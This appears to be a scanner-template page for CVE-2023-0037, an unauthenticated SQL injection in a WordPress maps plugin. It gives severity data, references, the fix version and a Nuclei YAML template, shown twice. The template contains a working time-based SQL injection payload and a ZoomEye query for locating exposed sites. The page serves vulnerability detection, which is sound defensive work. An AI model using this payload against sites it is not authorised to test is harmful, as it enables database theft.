WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection

CVE-2023-0037

Verified

Description

The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

Severity

Critical

CVSS Score

9.8

Exploit Probability

62%

Affected Product

map_builder_for_google_maps

Published Date

September 10, 2025

Template Author

riteshs4hu

CVE-2023-0037.yaml

id: CVE-2023-0037

info:
  name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including user credentials, map configuration data, and sensitive site information.
  remediation: Fixed in 1.0.73
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
    - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
    - https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0037
    cwe-id: CWE-89
    epss-score: 0.61728
    epss-percentile: 0.98369
    cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: map_builder_for_google_maps
    framework: wordpress
    zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(body, "wd-google-maps")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4b0a00483046022100e92dd84281274694526595f6a9504c812b7d4823472c84afc10bb90f449ab96a022100e9841607fa4c665672e76fb119c82b70ff04d01388687606ad3dc14d96314a73:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2023-0037

CWE ID:

cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2023-0037 https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/https://bulletin.iese.de/post/wd-google-maps_1-0-72_1

Remediation Steps

Fixed in 1.0.73

id: CVE-2023-0037

info:
  name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including user credentials, map configuration data, and sensitive site information.
  remediation: Fixed in 1.0.73
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
    - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
    - https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0037
    cwe-id: CWE-89
    epss-score: 0.61728
    epss-percentile: 0.98369
    cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: map_builder_for_google_maps
    framework: wordpress
    zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(body, "wd-google-maps")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4b0a00483046022100e92dd84281274694526595f6a9504c812b7d4823472c84afc10bb90f449ab96a022100e9841607fa4c665672e76fb119c82b70ff04d01388687606ad3dc14d96314a73:922c64590222798bb761d5b6d8e72950

WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps